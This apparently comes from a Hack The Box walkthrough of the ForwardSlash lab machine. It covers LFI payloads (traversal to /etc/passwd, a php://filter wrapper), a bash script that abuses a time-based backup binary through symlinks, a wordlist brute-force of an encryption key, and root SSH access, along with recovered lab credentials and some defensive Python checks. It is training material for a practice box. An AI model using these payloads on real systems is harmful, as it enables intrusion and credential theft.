SecWalk.com

HTB Walkthrough ForwardSlash 10.10.10.183

Summary

Foothold

After some web enumeration we find a backup site that still contains an LFI. Looking around further, we discover a dev folder containing an index.php file, and in that file we find credentials.

User

After logging in we still need to become another user to gain more privileges. That user turns out to be pain, who owns a binary called backup. Running it shows that it only reads a file whose name matches the current time stamp, so by abusing that we are able to read a config .bak file and obtain pain's credentials.

Root

In pain's home folder there is a note saying he encrypted something. Luckily he also left the encryption script behind, so we are able to turn it into a brute-force decryption script. With the passphrase that recovers, we mount a backup image and grab root's id_rsa.

Enumeration

Nmap

nmap -sC -sV -p- 10.10.10.183

Only two ports are open: 22 (SSH) and 80 (HTTP).

Web

When visiting http://10.10.10.183 we get redirected to http://forwardslash.htb/, so let's put that in our hosts file.

This page doesn't show much, so we use gobuster to look for interesting folders or files:

gobuster dir -u http://forwardslash.htb/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x php,txt


The scan reveals a note.txt with the following content:

Pain, we were hacked by some skids that call themselves the "Backslash Gang"... I know... That name... 
Anyway I am just leaving this note here to say that we still have that backup site so we should be fine.

-chiv

So we have two potential usernames, pain and chiv, and the note mentions a backup site. Let's use wfuzz to discover subdomains:

wfuzz -u http://forwardslash.htb -H "Host: FUZZ.forwardslash.htb" -w /opt/SecLists/Discovery/DNS/subdomains-top1million-20000.txt --hw 0

backup is a hit, so let's add backup.forwardslash.htb to our hosts file as well.

The backup site:

We can't log in with default credentials, but we can create our own account and log in with that.

After clicking around, the Change your Profile Picture page looks interesting because the form has been disabled:

Looking at the source code to find out which parameter the form uses:

Turns out it is url.

Now let's send the request to Burp and submit the form anyway.

It turns out this form is vulnerable to LFI.

Burp request:

POST /profilepicture.php HTTP/1.1
Host: backup.forwardslash.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=1geaonp5t1c3pt937l15m24mt9
Upgrade-Insecure-Requests: 1
Content-Length: 45

url=/../../../../../../../../../../etc/passwd

After searching around with the LFI I couldn't find anything useful. Since we haven't scanned the new vhost for hidden folders yet, it's time to do that now:

gobuster dir -u http://backup.forwardslash.htb/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x php,txt

We find a few files, among them a config file containing:

<?php
//credentials for the temp db while we recover, had to backup old config, didn't want it getting compromised -pain
define('DB_SERVER', 'localhost');
define('DB_USERNAME', 'www-data');
define('DB_PASSWORD', '5iIwJX0C2nZiIhkLYE7n314VcKNx8uMkxfLvCTz2USGY180ocz3FQuVtdCy3dAgIMK3Y8XFZv9fBi6OwG6OYxoAVnhaQkm7r2ec');
define('DB_NAME', 'site');

/* Attempt to connect to MySQL database */
$link = mysqli_connect(DB_SERVER, DB_USERNAME, DB_PASSWORD, DB_NAME);

// Check connection
if($link === false){
    die("ERROR: Could not connect. " . mysqli_connect_error());
}
?>

This file doesn't give us anything useful, so time to explore the dev folder:

gobuster dir -u http://backup.forwardslash.htb/dev -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x php,txt

The dev folder only contains an index.php.

When we try to read that file through our LFI we get the message: Permission Denied; not that way 😉

So there must be another way to read this file.

Using the php://filter wrapper with base64 encoding, we get the file base64-encoded:

url=php://filter/convert.base64-encode/resource=dev/index.php
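The two payloads above (a traversal path and a php://filter stream wrapper) both reach the file reader because the url parameter is used as a path without validation. As an added example that is not the site's PHP (the page does not show that code), here is the check a defender would put in front of such a read, written in Python; the uploads directory name is an assumption.

```python
import os
from urllib.parse import urlsplit

# Directory the profile-picture feature is allowed to read from (assumed name).
PROFILE_DIR = "/var/www/backup/uploads"


def resolve_profile_picture(user_value, base_dir=PROFILE_DIR):
    """Return the absolute path to serve, or None if the value must be rejected.

    Two checks cover the two payloads used against the url parameter:
    1. Any URL scheme (php://, file://, data://, ...) is rejected outright, so
       php://filter/convert.base64-encode/resource=... never reaches the reader.
    2. The joined path is resolved (symlinks and '..' collapsed) and must stay
       inside base_dir, so /../../../../etc/passwd cannot escape it.
    """
    if not user_value or "\x00" in user_value:
        return None
    # urlsplit().scheme is non-empty for 'php://filter/...' style values.
    if urlsplit(user_value).scheme:
        return None
    # Treat the value as a name relative to base_dir, then canonicalise both
    # sides and compare prefixes with commonpath (a plain startswith check
    # would accept /var/www/backup/uploads-evil).
    candidate = os.path.realpath(os.path.join(base_dir, user_value.lstrip("/")))
    base = os.path.realpath(base_dir)
    if candidate == base or os.path.commonpath([base, candidate]) != base:
        return None
    return candidate
```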

Decoding the output, we find some credentials:

chiv:N0bodyL1kesBack/

Log in with SSH:

And we are logged in.

After some enumeration we see pain is also a user on the box. We can read one file in his home folder, called note.txt:

Pain, even though they got into our server, I made sure to encrypt any important files and then did some crypto magic on the key… I gave you the key in person the other day, so unless these hackers are some crypto experts we should be good to go.

-chiv

We are also able to look into a folder named encryptorinator.

The folder contains two files:

  • ciphertext
  • encryptor.py

After some more enumeration we also find a note in /var/backups:

Chiv, this is the backup of the old config, the one with the password we need to actually keep safe. Please DO NOT TOUCH.

-Pain

After that we find a binary called backup which is owned by pain.

When we run it we see the following:

        Pain's Next-Gen Time Based Backup Viewer
        v0.1
        NOTE: not reading the right file yet,
        only works if backup is taken in same second
----------------------------------------------------------------------

Current Time: 16:49:23
ERROR: e8f539d01f643161206b6f9ff1353c05 Does Not Exist or Is Not Accessible By Me, Exiting...

So the viewer only reads a backup file if the backup was taken in the same second: the file name it looks for is the MD5 hash of the current time (HH:MM:SS). In /var/backups there is one interesting file, also owned by pain, called config.php.bak.

To read that file we create a script that "fools" the backup binary: it computes the hash for the current second and creates a symlink with that name pointing at the file we want to read:

#!/bin/bash
# The backup binary only reads a file whose name is the MD5 of the current
# time (HH:MM:SS), so compute that hash for this second and point a symlink
# with that name at the file we want it to read.
time=$(date +"%T")
hash=$(echo -n "$time" | md5sum | cut -d' ' -f1)
ln -s /var/backups/config.php.bak "$hash"
/usr/bin/backup

chmod +x secwalk.sh

./secwalk.sh


The output contains the old config with credentials:

Current Time: 16:56:39
<?php
/* Database credentials. Assuming you are running MySQL

server with default setting (user 'root' with no password) */
define('DB_SERVER', 'localhost');
define('DB_USERNAME', 'pain');
define('DB_PASSWORD', 'db1f73a72678e857d91e71d2963a1afa9efbabb32164cc1d94dbc704');
define('DB_NAME', 'site');

/* Attempt to connect to MySQL database */
$link = mysqli_connect(DB_SERVER, DB_USERNAME, DB_PASSWORD, DB_NAME);

// Check connection
if($link === false){
    die("ERROR: Could not connect. " . mysqli_connect_error());
}
?>

pain:db1f73a72678e857d91e71d2963a1afa9efbabb32164cc1d94dbc704

At first glance this looks like a hash, but it turns out to be simply pain's password.
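The backup viewer failed because it trusted a file name: anything named after the current second is opened, and the open follows symlinks to a file the viewer (running as pain) can read but the caller cannot. An added example, not the page's script and not the viewer's source (which the page does not show): it rebuilds that setup in a temporary directory in Python, assuming from the script above that the expected name is the MD5 of HH:MM:SS, and shows that opening with O_NOFOLLOW and checking the owner refuses the symlink that a naive open happily follows.

```python
import errno
import hashlib
import os
import tempfile
import time


def expected_backup_name(now=None):
    """Name the viewer looks for: MD5 of HH:MM:SS (assumed from the page's script)."""
    t = time.strftime("%H:%M:%S", time.localtime(now))
    return hashlib.md5(t.encode()).hexdigest()


def naive_read(path):
    """What the viewer effectively does: open by name, following symlinks."""
    with open(path, "rb") as f:
        return f.read()


def safe_read(path):
    """Refuse symlinks (O_NOFOLLOW) and files not owned by the caller, then read."""
    fd = os.open(path, os.O_RDONLY | os.O_NOFOLLOW | os.O_CLOEXEC)
    try:
        st = os.fstat(fd)
        if st.st_uid != os.getuid():
            raise PermissionError("file not owned by the invoking user")
        return os.read(fd, st.st_size)
    finally:
        os.close(fd)


def demo():
    """Constructed scenario: a symlink named like a backup points at a 'secret'."""
    with tempfile.TemporaryDirectory() as d:
        secret = os.path.join(d, "config.php.bak")
        with open(secret, "wb") as f:
            f.write(b"define('DB_PASSWORD', 'constructed-secret');\n")
        link = os.path.join(d, expected_backup_name())
        os.symlink(secret, link)
        leaked = naive_read(link)          # the symlink is followed
        try:
            safe_read(link)
            blocked = False
        except OSError as e:
            blocked = e.errno == errno.ELOOP  # O_NOFOLLOW rejects the symlink
        return leaked, blocked
```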

Running sudo -l as pain shows the following:

We should be able to mount a backup. Earlier we found an image file at /var/backups/recovery/encrypted_backup.img.

Running the Linux file command against it shows it is LUKS-encrypted:

We should be able to unlock the image like this:

sudo /sbin/cryptsetup luksOpen /var/backups/recovery/encrypted_backup.img backup

But, as expected, we are asked for a passphrase.

The note in pain's home folder mentioned crypto, and this image is encrypted, so let's try to decrypt the note's ciphertext.

Since we have both the ciphertext and the encryptor script, we should be able to decrypt it.

I downloaded the files to my machine and modified encryptor.py slightly so it can brute-force the key with a wordlist.

I added the following to the script:

# decrypt() is the function from the original encryptor.py, defined earlier in this file.
def bruteforce():
    with open('ciphertext', 'rb') as cipherfile:
        ciphertext = cipherfile.read()
    with open('/usr/share/wordlists/rockyou.txt', 'r') as wordlist:
        for w in wordlist:
            # strip the newline so the key is the bare wordlist entry
            dec = decrypt(w.rstrip('\n'), ciphertext)
            # readable English plaintext will almost certainly contain "the"
            if "the" in dec:
                print(dec.decode(errors='ignore'))

bruteforce()

python decrypt2.py

~Uy.diWyou liked my new encryption tool, pretty secure huh, anyway here is the key to the encrypted image from /var/backups/recovery: cB!6%sdH8Lj^@Y*$C2cf

key: cB!6%sdH8Lj^@Y*$C2cf

Now it is time to run the luksOpen command again and enter the passphrase:

sudo /sbin/cryptsetup luksOpen /var/backups/recovery/encrypted_backup.img backup

cB!6%sdH8Lj^@Y*$C2cf

sudo /bin/mount /dev/mapper/backup ./mnt/

The mounted backup contains an id_rsa file:

chmod 600 id_rsa

ssh -i id_rsa root@10.10.10.183

made by S3cwalk

Disclaimer: Please use our posts for educational purposes only. Wrong usage could make you end up in jail.
